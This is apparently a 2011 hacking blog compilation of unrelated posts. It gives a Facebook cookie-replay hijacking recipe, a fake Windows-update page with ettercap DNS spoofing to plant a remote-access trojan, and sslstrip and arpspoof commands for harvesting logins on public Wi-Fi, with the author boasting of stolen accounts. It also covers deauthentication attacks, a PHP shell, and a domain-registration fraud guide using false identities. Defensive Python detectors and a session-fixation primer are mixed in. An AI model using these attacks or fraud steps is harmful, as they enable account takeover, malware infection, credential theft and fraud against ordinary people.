Log in to your Facebook account and sniff your own cookie, OR collect a few live Facebook cookies ("biscuits") of your target(s).
1 ] Generate an original (OG) 10-digit Unix timestamp. If possible, not much older than facebook.com's current system time.
2 ] Send a GET request to www.facebook.com port 80 after calculating the required variables (below):
GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIT-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
3 ] From the Response Obtained :
Obtain the variable nctr[nid]. For now, keep nctr[id] the same as nctr[nid].
Calculating the new nctr[ct] :
Add 79 to the original timestamp, then append 3 more digits to the end.
Calculating &oldest= :
Deduct 144556 from Original Timestamp.
Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request
Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request
Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request
Your login_x actually looks like
a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged, in the percent-encoded (hex) form shown in the cookie header.
4 ] Send a GET Request like below with the above calculated variables :
GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIT-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php
5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the new, true nctr[id]= for the status update POST request :-)
6 ] Generate a new POST Request with the above calculated new variables :
POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIT-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php
action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-ID)&status=TYPE-THE-STATUS-HERE&target_id=0&composer_id=(24-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&post_form_id=(32-HEX-STRING-FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-FROM-home.php-RESPONSE)&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-EXPLAINED-IN-POINT-3)375
7 ] Use the above variables to view any content with the appropriate GET requests.
8 ] For POST-ing changes, go back to 2 ] and redo :-)
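The replay in steps 1 to 8 works because every cookie it needs travels in cleartext over port 80 and is accepted by the server with no binding to the client that originally received it. As an added example, not part of the original post, here is a Python check a site owner can run over the Set-Cookie headers of a login response to catch session cookies that would survive such a replay. The cookie names are the ones used in the tutorial, the values are constructed placeholders, and SESSION_COOKIES is an assumed list of which names carry the session, not any Facebook setting.

```python
"""Audit Set-Cookie headers for session cookies that lack the attributes
that blunt cookie replay from a cleartext capture (added example)."""

# Assumption for this example: these names carry the session (taken from
# the cookie names used in the tutorial above).
SESSION_COOKIES = {"xs", "c_user", "h_user", "login_x"}


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value}).
    Valueless attributes such as Secure and HttpOnly map to True."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def audit_set_cookie(headers):
    """Return {cookie_name: [findings]} for session cookies missing protection."""
    findings = {}
    for header in headers:
        name, _value, attrs = parse_set_cookie(header)
        if name not in SESSION_COOKIES:
            continue
        issues = []
        if "secure" not in attrs:
            # Without Secure the browser sends it over plain HTTP (port 80),
            # which is exactly what the sniffing step above relies on.
            issues.append("missing Secure: sent in cleartext, sniffable on port 80")
        if "httponly" not in attrs:
            issues.append("missing HttpOnly: readable by injected script")
        samesite = attrs.get("samesite")
        if samesite is None or samesite is True or str(samesite).lower() == "none":
            issues.append("SameSite not Lax/Strict: attached to cross-site requests")
        if issues:
            findings[name] = issues
    return findings


# Constructed sample response headers; values are placeholders, not real cookies.
SAMPLE_HEADERS = [
    "datr=1311465600-PLACEHOLDERHEX; expires=Tue, 23-Jul-2013 00:00:00 GMT; path=/; domain=.facebook.com",
    "xs=PLACEHOLDER32HEX; path=/; domain=.facebook.com; HttpOnly",
    "c_user=1234567890; path=/; domain=.facebook.com",
    "h_user=PLACEHOLDER12; path=/; domain=.facebook.com; Secure; HttpOnly; SameSite=Lax",
]

if __name__ == "__main__":
    for cookie, issues in audit_set_cookie(SAMPLE_HEADERS).items():
        print(cookie)
        for issue in issues:
            print("  -", issue)
```

In the sample, xs and c_user are reported and h_user passes; datr is skipped because it is not in the assumed session list. The Secure flag is the one that matters for the tutorial's sniffing step, since the other two do nothing against a passive capture of a port-80 request.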
Sunday, July 24, 2011
[PHP]Php Shell R00TSH3ll[SHELL]
Hey guys, I made my own PHP shell that anyone can use. Please do not edit it; otherwise, further versions with huge improvements will be encrypted to base64.
heres link:
R00TSH3ll Beta 2 Build 3
311 KB.
Hijacking Facebook with cookies !!! (Multi-Platform)
Download to FBController
This is facebook controller v3.
Software Required:
FBControllerv3
Backtrack5 or Windows or other distros that have WINE (BT comes with WINE)
Mantra (Comes with BT5) otherwise goto: Mantra HOmepage
gedit / notepad
------------------------
Ok, start up Mantra, go to facebook.com and go to your victim's wall.
Go to Firebug, then to Firecookie, and view the cookies.
Open up the COOKIE text file, match the cookies shown in Mantra with the COOKIE text file using the victim's information, and save it when you're finished.
Then load up Command Prompt if you're in Windows. If not, go to WINE explorer, go to C:\Windows\System32\ and run cmd.exe; this gives WINE's command prompt, which works just like Windows'. Go to the directory of FBController and use this syntax:
FBController COOKIE.txt. If it's successful, it will show multiple options to compromise the Facebook account.
AGREEMENT:
By reading this tutorial and downloading the file, you are responsible, not Hini or the author of this software.
~ This tutorial was written by HiniAes do not leech.
Wednesday, July 20, 2011
Tuesday, July 19, 2011
Tutorial How to Install Google Chrome on BT5 same as Ubuntu
Installing Google Chrome on Backtrack 5
Google Chrome can be installed in many ways on Ubuntu 11.04. Here I'll explain a few simple methods. You can also install Chromium (almost identical to Google Chrome); it is available in Ubuntu Software Center or Synaptic Package Manager. Just follow the steps.
step #1 : Go to its official website and download the Debian package. Google Chrome version 10.x.* is the latest one.
Download the Google Chrome for Backtrack5
step #2 : Open the saved file with Ubuntu Software Center (Right Click on the Package, then select Open With USC; click on install Button to proceed) or Use the dpkg command to install the package. To install from the command line, type the command given below and enter your login password to proceed.
dpkg -i google-chrome-stable_current_i386.deb
step #3 : That's all.. No more steps.. Enjoy surfing with Chrome.
Here is one snapshot, how Google Chrome looks on BT5
Get Free Domain [Fraud + Knowledge]
On no account will I be held responsible for your actions.
Requires:
1. Google Chrome (to translate) Download: http://6660e7e2.spam.com
2.e-mail address!
First, go to: http://1c2e4b4b.spam.com
Ok, now enter the domain you want
Select one of the available domain that you want
Click the Next button
Select a hosting package and click "Order Now"
Click next button
Now, you need to enter personal information! Of course, you will not do that unless you are an idiot! You need to create a false identity; how? Follow these instructions! Go to: http://576d357f.spam.com and fill the empty fields with false data. When done, click generate!
And there complete the form false information!
Now you will be prompted to enter your name and account number. You will not do that (unless you are a retard), but you will add the information from the previous step!
You will now see the details of the order!
Check the box that says "I have read the terms etc" and then click "close order"
And finally, it will ask you to confirm your order!
It is better to hack credit and then register a domain, but i will show you that maybe some other time ...
PS: Replace spam to link bucks (without space)
Have fun :D
How to make ANY email address
This page from Microsoft lets you use any email domain like fbi.gov, facebook.com, and admin.tk anything!!!!
https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&sl=1&vv=410&lc=1033
Go to that link there you go!!!
Monday, July 18, 2011
Here's my new deface page
http://pastehtml.com/view/b0vu9p3iz.html
20x.cc seems to be down :( can't upload there + I lost my rootshell at beta 3 build 3; I only have beta 2 build 3.
Wednesday, July 13, 2011
MITM
Ok first of all what you need to run this attack using the method i will show you:
-You need to be running a backtrack OS [3/4/R1]
-To be connected to a wireless network [Any form of encryption]
-Wireless traffic
And thats it! This is going to be a short but sweet tutorial!
**This guide is intended for the sole purpose of penetration testing only**
Running Backtrack
I think that there are other methods of performing this attack that don't depend on you running Backtrack, but since i am assuming that you have cracked a network running backtrack i don't see why this should be a problem. Also this method is very easy;]
First of all you need to be running a version of backtrack, for more information on how to do this, click the link to my WPA/WPA2 cracking tutorial at the top, that covers several methods of booting backtrack from all OS's.
Finding targets
Second of all, you need to be connected to a wireless network with network traffic; this can basically be anywhere and any form of wireless network. If you are connected, you can attack!
A good method of maximising the effect of this attack is to target wi-fi networks with as many clients as possible, preferably in a public place. Prime examples are unsecured networks in hotels, schools, offices, cafes and any free public wi-fi spots. These are great as they don't require any cracking!
Optional
However, if you have cracked a network, then you can use a wi-fi adapter capable of going into monitor mode to search for the best wi-fi network. The most common wi-fi adapter capable of doing this is the ALFA AWUS036H; for more information on how to monitor wireless networks and spoof MAC addresses, refer to my WPA/WPA2 cracking tutorial. This will allow you to better survey the area and choose a target network with the most clients.
Spoofing your MAC address
If you want to be safe then it is a good idea to spoof your MAC address. Luckily, for this attack you don't need a wireless card capable of packet injection; any card should do fine =] This means that you only need to type the following into a terminal.
Code:
ifconfig wlan0 down
macchanger -s wlan0
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
Where I have written wlan0 you will have to put the name of your wireless interface; however, unless you have two wireless cards it is most probably "wlan0". If you do have 2 wireless cards then you will know what to do ;]
The attack
This is the easy part! all you need to do is enter the following into a terminal
Code:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -w passwords
This will forward all wi-fi traffic back to the client so no one gets suspicious. It will also create a document on your desktop called "passwords"; leave this well alone for now. Another key part of this attack is SSLstrip, which lets you steal the info from secure web pages (Hotmail, Facebook, Gmail, eBay etc.).
Now leave that terminal open and open a new one. Now we need to find out the name of the gateway that we will be redirecting traffic to. To do this, simply type "route" into the terminal and wait for a minute.
You should see something like this:
As you can see from this, the gateway that my wi-fi traffic is going through is called "BThomehub.Home", and the interface connected is wlan1. We now use this info when entering the next command.
Side note: You can also use:
Code:
route -n | grep 'UG[ \t]' | awk '{print $2}'
to show the IP address of the router. This is much more reliable, as sometimes the gateway name can be cut off. This is also useful if you are using ettercap.
Code:
arpspoof -i <interface> <gateway>
This will commence the MITM attack; the screen should look something like this:
Now leave both of the open terminals running; they are now capturing all of the data sent across the wi-fi. Have a coffee, do your homework, go to a meeting. The longer you leave it, the higher chance you will have of catching something juicy!
Processing the data
You will now have a large text or HTML file on your desktop; these are your results, don't open them just yet. Protip: if you have a slow computer with a low amount of RAM, don't leave your MITM attack running for too long or you could generate a text file too large for your computer to handle! Now close down your two terminals and open the text file in your favourite editor. I just use the Kate advanced text editor; whichever one you use, it needs to have a search function.
I would upload some screen caps of me doing this but i don't have any one to target to generate the file =[ so sorry about that.
In Kate once you have opened the file press F3 [or just CTRL+F in another editor] to search through the document. In Kate you want to un-tick "case sensitive".
Now the fun bit! Search the document for the following:
password=
password
pass=
pass
username=
username
user=
user
email...
Be creative and think of others. Basically, keep searching through the document until you come across "username=Middle, password=i<3HF", then look above for the website they were on and voilà, you have acquired a login!
In under 2 hours in a hotel with unsecured wi-fi i got 10 logins: 2 Hotmail, 3 Facebook, 4 Gmail and one for "Gay.com" XD
Hope you enjoyed, please leave feedback =]
This attack also works for wired connections; to do this you need to change the interface you use to the one connected to the wired network. To determine what this device is, use the following.
Code:
ifconfig
Now just look for the interface that has the IP address and use that instead of wlan0. All credits go to ac1dxtrem for this protip =]
"Airbomb"
Airdrop-ng tutorial - Rule Based Deauth
This tutorial is based in backtrack4 and i'll assume you are competent with linux to the standard this tutorial requires. You must also have a packet injection/monitor mode supported wireless interface.
Capturing Your Surroundings
First we need to capture the wireless activity in the area.
airmon-ng [to check the interface you will be using]
airmon-ng start wlan0 [starts the interface 'wlan0', change it accordingly]
airodump-ng mon0 -w capture --output-format csv ['mon0' is your interface in monitor mode, and csv is the output filetype of the captured information with a filename in this example of 'capture']
The next step can be done before capturing if you already know the MAC address of a specific target, but it is normally done afterwards so you can review the output of airodump-ng [the last command above] in the terminal.
MAC Rules Info
We need to understand the basic formula for how the 'rules' work within airdrop-ng: a = allow, whereas d = deny. I know, rocket science isn't it lol. This is where it gets to the good bit. The format of each rule, whether it allows or denies access, is allow (a) or deny (d), then the bssid's MAC, followed by the client's MAC. Below are examples of how it would look.
Allow rule: a/bssid MAC ['any']|slave's MAC ['any']
Deny rule: d/bssid MAC ['any']|slave's MAC ['any']
However, you may wonder what the 'any' is for. Well, if you decide you don't want anyone to connect to a bssid then you would put this, for example:
d/00:11:22:33:44:55|any [00:11:22:33:44:55 being the bssid you wish to alienate]
To do the opposite and block one client MAC from connecting to anything:
d/any|00:11:22:33:44:55 [00:11:22:33:44:55 being, in this example, the client you wish to block]
Implementing MAC Rules
To put the rules in place we need to set up a 'rules' file which airdrop-ng will read and implement the rules from. To add rules to the file we do so thus:
echo '#D' > rules && echo 'd/any|xy:xy:xy:xy:xy:xy' >> rules [this command will create the file 'rules' on your desktop and enter the above rule under the heading '#D']
The contents will look like this [remember I'm using D to remind you this is Deny!!]
#D
d/any|xy:xy:xy:xy:xy:xy
Running Airdrop-ng
Installing airdrop-ng through Synaptic is what I'd advise you to do, as it places everything in the right place for you to follow this tutorial. Navigate using the terminal to the airdrop directory:
cd /pentest/wireless/airdrop-ng/
Once there we start airdrop-ng:
airdrop-ng -i mon0 -t /capture.csv -r /rules [-i = interface, -t = capture file and -r = rules file. You can also run a rule debugging mode which is activated by using -b after rules e.g. airdrop-ng -i mon0 -t /capture.csv -r /rules -b]
We next have to understand a very important concept in how airdrop-ng reads the rules file. The program reads from top to bottom, so allow rules applying to a specific MAC must come before deny rules applying to the same MAC. Using another example I'll demonstrate.
#D
d/xy:xy:xy:xy:xy:xy|any [we've now blocked all access to an AP/bssid, but then we decide we want one specific MAC to be able to connect to it. This must be done as shown below].
#A
a/xy:xy:xy:xy:xy:xy|yz:yz:yz:yz:yz:yz
#D
d/xy:xy:xy:xy:xy:xy|any
As you can see above, our original rule denying every connection to the AP is below the rule granting/allowing access to the one MAC/client. This must be done in this format!! To make alterations to the rules file use the following command:
nano rules [you can use other text editors, but I prefer nano; it's down to personal preference]
Note: a lot of cases have been reported on a few forums of airdrop-ng not responding to more than the 1st allow rule. So have one allow and the rest denials.
OUI [Organizationally Unique Identifier] Hardware names
Airdrop-ng also has the function to allow or deny based on the OUI and hardware names [but not to the same extent]. It is implemented in the same way as the MACs. I won't be giving a tutorial on this part because it has had hit-and-miss results and I've not personally tried it, only the MAC deauth.
However, the OUI list is located below:
nano /pentest/wireless/airdrop-ng/support/oui.txt
To update the OUI list use:
airdrop-ng -u
How does this tutorial help you?
If you combine my other tutorial on SSL sniffing and SoftAPs with this, you could hijack someone's AP, route traffic through your SoftAP using their connection, ban all access to the original AP and palm your AP off as the original using the airdrop-ng rule system.
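The rule-based deauthentication described above (a "d/bssid|any" rule in particular) shows up on the air as a burst of deauthentication frames carrying the target BSSID, far more than a healthy network ever emits. As an added example that is not part of the tutorial or of airdrop-ng, here is a Python detector for that burst pattern, run over a constructed list of management-frame records. The record shape (ts in seconds, type, bssid, dst) is an assumption of this example; mapping a real monitor-mode capture to it is not shown.

```python
"""Sliding-window detector for deauthentication floods (added example)."""
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"


def deauth_bursts(frames, window=10.0, threshold=20):
    """Return one alert per (bssid, dst) pair that saw more than `threshold`
    deauth frames inside any `window`-second span.

    Each alert is (bssid, dst, count_at_trigger, window_start_ts).
    dst == BROADCAST corresponds to the 'd/bssid|any' rule above: every
    client of that access point is being kicked."""
    per_pair = defaultdict(list)
    for frame in frames:
        if frame["type"] == "deauth":
            per_pair[(frame["bssid"].lower(), frame["dst"].lower())].append(frame["ts"])

    alerts = []
    for (bssid, dst), times in per_pair.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Shrink the window from the left until it spans <= `window` seconds.
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count > threshold:
                alerts.append((bssid, dst, count, times[start]))
                break  # one alert per pair is enough for this example
    return alerts


# Constructed capture: 25 broadcast deauths in 5 s from one AP (a flood),
# 3 unicast deauths spread over 9 s (normal churn) and 50 beacons (noise).
AP = "00:11:22:33:44:55"
CLIENT = "66:77:88:99:aa:bb"
SAMPLE_FRAMES = (
    [{"ts": 100.0 + i * 0.2, "type": "deauth", "bssid": AP, "dst": BROADCAST} for i in range(25)]
    + [{"ts": 100.0 + i * 3.0, "type": "deauth", "bssid": AP, "dst": CLIENT} for i in range(3)]
    + [{"ts": 100.0 + i * 0.1, "type": "beacon", "bssid": AP, "dst": BROADCAST} for i in range(50)]
)

if __name__ == "__main__":
    for bssid, dst, count, t0 in deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth flood: bssid={bssid} dst={dst} {count} frames from t={t0}")
```

The threshold and window are tuning knobs; a wireless IDS would also key on the sender's address and on deauths that carry a BSSID no real AP nearby advertises. Only the broadcast pair trips the alert in the sample, since the three unicast deauths never exceed the threshold.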
Get your R.A.T onto a pc
This is how to get someone to download your rat if you're on the same network
This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering the same damn question over and over again..
Start by downloading backtrack 4 and burning the iso.
Code:
http://www.remote-exploit.org/backtrack_download.html
Boot into backtrack and open the file browser, and browse to /var/www/. There will be a file called index.html.
Open it with kate (or some other text editor), delete the code that is in there and copy in the following code.
Code:
<html>
<body>
<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
</p>
<p align="center" class="style2"></p>
<p> </p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4"> </p>
</body>
</html>
Now copy your rat into the same directory and name it windowsupdate.exe
Start apache
Code:
/etc/init.d/apache2 start
open firefox and navigate to 127.0.0.1. Your fake update page should show up.
Now set up the dns_spoof configuration
Code:
echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns
Replace 192.168.1.101 with your own ip (ifconfig)
Use nmap to find your target ip
Code:
nmap -sP your_subnet/24
Now arp-poison with ettercap using the dns_spoof plugin.
Code:
ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof
replace 192.168.1.102 with your target's ip.
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.
If you want to target everyone on the network you can use the following command.
Code:
ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoof
Now every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.
Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.
Code:
ipconfig /flushdns
This will let them browse again.
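Both the arpspoof step in the MITM tutorial and the ettercap "-M arp:remote" step here depend on the same thing: the attacking host answering ARP for addresses that are not its own, so that the gateway's IP (and, for the "//" form, every host's IP) maps to the attacker's MAC. As an added example for both sections, not code from either tutorial or tool, here is the detection logic a defender would run over ARP replies seen on the segment. Records are assumed to be (ts, sender_ip, sender_mac) tuples, the MACs and IPs are constructed, and feeding a live capture into these functions is outside the example.

```python
"""ARP cache poisoning detection over a list of ARP reply records (added example)."""
from collections import defaultdict


def arp_conflicts(replies, trusted=None):
    """Return [(ip, {macs})] for every IP claimed by more than one MAC, plus any
    IP whose claimed MACs differ from a `trusted` {ip: mac} map (use it to pin
    the gateway). `replies` holds (ts, sender_ip, sender_mac) tuples."""
    claims = defaultdict(set)
    for _ts, ip, mac in replies:
        claims[ip].add(mac.lower())
    findings = []
    for ip, macs in sorted(claims.items()):
        suspicious = len(macs) > 1
        if trusted and ip in trusted and macs != {trusted[ip].lower()}:
            suspicious = True
        if suspicious:
            findings.append((ip, macs))
    return findings


def macs_claiming_many(replies, limit=3):
    """Return MACs that answered ARP for more than `limit` distinct IPs. One
    host legitimately owns one or two addresses; a host claiming a large
    slice of the subnet is the whole-network form of the attack."""
    ips_per_mac = defaultdict(set)
    for _ts, ip, mac in replies:
        ips_per_mac[mac.lower()].add(ip)
    return sorted(mac for mac, ips in ips_per_mac.items() if len(ips) > limit)


# Constructed sample: real gateway and client answer first, then a third MAC
# claims the gateway, the client and two more hosts.
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:00:00:01"
ROGUE_MAC = "de:ad:be:ef:00:01"
SAMPLE_REPLIES = [
    (0.0, GATEWAY_IP, GATEWAY_MAC),
    (0.5, "192.168.1.102", "aa:bb:cc:00:00:02"),
    (1.0, GATEWAY_IP, ROGUE_MAC),
    (1.1, "192.168.1.102", ROGUE_MAC),
    (1.2, "192.168.1.103", ROGUE_MAC),
    (1.3, "192.168.1.104", ROGUE_MAC),
    (2.0, "192.168.1.50", "aa:bb:cc:00:00:50"),
]

if __name__ == "__main__":
    for ip, macs in arp_conflicts(SAMPLE_REPLIES, trusted={GATEWAY_IP: GATEWAY_MAC}):
        print(f"{ip} claimed by {sorted(macs)}")
    for mac in macs_claiming_many(SAMPLE_REPLIES):
        print(f"{mac} answers ARP for more than 3 addresses")
```

Pinning the gateway with `trusted` catches the poisoning even when the rogue reply is the only one seen for that IP, which is the normal case once the victim's cache has been overwritten. Static ARP entries for the gateway and dynamic ARP inspection on the switch are the corresponding mitigations.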
Monday, July 11, 2011
Session Hijacking Basic[Ezine]
Session Hijacking Basic
__ _ _ _ _ _ / _\ ___ ___ ___(_) ___ _ __ /\ /(_)(_) __ _ ___| | _(_)_ __ __ _ \ \ / _ \/ __/ __| |/ _ \| '_ \ / /_/ / || |/ _` |/ __| |/ / | '_ \ / _` | _\ \ __/\__ \__ \ | (_) | | | | / __ /| || | (_| | (__| <| | | | | (_| | \__/\___||___/___/_|\___/|_| |_| \/ /_/ |_|/ |\__,_|\___|_|\_\_|_| |_|\__, | |__/ |___/ Basic # language: English # Title: Session Hijacking Basic # Date: 2011-01-13 # Author: Filipe Barros/@barros_filipe | +01 - Session Fixation | +02 - Session Hijacking | +03 - Firesheep Have fun :) ====== +01 - Session Fixation ====== The attacker attempts to gain access to another user's session by posing as that user. The information for an attacker is the session identifier, because this is required for any impersonation attack. There are three common methods used to obtain a valid session identifier: * Fixation * Capture * Prediction Prediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation. Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been Internet Explorer, and cookies are slightly less exposed than GET variables. for those users who enable cookies, you can provide them with a more secure mechanism by using a cookie to propagate the session. Fixation is the simplest method of obtaining a valid session identifier. While it's not very difficult to defend against, if your session mechanism consists of nothing more than session_start(), you are vulnerable. 
To demonstrate session fixation, I'll use the following script, session-hijacking.php: [ Begin PHP CODE ] <?php session_start(); if (!isset($_SESSION['visits'])) { $_SESSION['visits'] = 1; } else { $_SESSION['visits']++; } echo $_SESSION['visits']; ?> [ End PHP CODE ] First make sure that you do not have an existing session identifier (perhaps delete your cookies), then visit this page with ?PHPSESSID=123456789 appended to the URL. Next, with a completely different browser (or even a completely different computer), visit the same URL again with ?PHPSESSID=123456789 appended. You will notice that you do not see 1 output on your first visit, but rather it continues the session you previously initiated. If there isn't an active session associated with a session identifier that the user is presenting, then regenerate it just to be sure: [ Begin PHP CODE ] <?php session_start(); if (!isset($_SESSION['initiated'])) { session_regenerate_id(); $_SESSION['initiated'] = true; } ?> [ End PHP CODE ] The problem with such a simplistic defense is that an attacker can simply initialize a session for a particular session identifier and then use that identifier to launch the attack. ====== +02 - Session Hijacking ====== If your session mechanism have only session_start(), you are vulnerable. With the most simplistic session mechanism, a valid session identifier is all that is needed to successfully hijack a session. In order to improve this, we need to see if there is anything extra in an HTTP request that we can use for extra identification. Recall a typical HTTP request: GET / HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Gecko Accept: text/xml, image/png, image/jpeg, image/gif, */* Cookie: PHPSESSID=123456789 Only the Host header is required by HTTP/1.1, so it seems unwise to rely on anything else. However, consistency is really all we need, because we're only interested in complicating impersonation without adversely affecting legitimate users. 
Imagine that the previous request is followed by a request with a different User-Agent:

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla Compatible (MSIE)
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789

Although the same cookie is presented, should it be assumed that this is the same user? It seems highly unlikely that a browser would change the User-Agent header between requests, right? Let's modify the session mechanism to perform an extra check:

[ Begin PHP CODE ]
<?php
session_start();
if (isset($_SESSION['HTTP_USER_AGENT'])) {
    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) {
        /* Prompt for password */
        exit;
    }
} else {
    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}
?>
[ End PHP CODE ]

Now an attacker must not only present a valid session identifier, but also the correct User-Agent header that is associated with the session. This complicates things slightly, and it is therefore a bit more secure.

Imagine if we required the user to pass the MD5 of the User-Agent in each request. An attacker could no longer just recreate the headers that the victim's requests contain; it would also be necessary to pass this extra bit of information. While guessing the construction of this particular token isn't too difficult, we can complicate such guesswork by simply adding an extra bit of randomness to the way we construct the token:

[ Begin PHP CODE ]
<?php
$string = $_SERVER['HTTP_USER_AGENT'];
$string .= 'SHIFLETT'; /* Add any other data that is consistent */
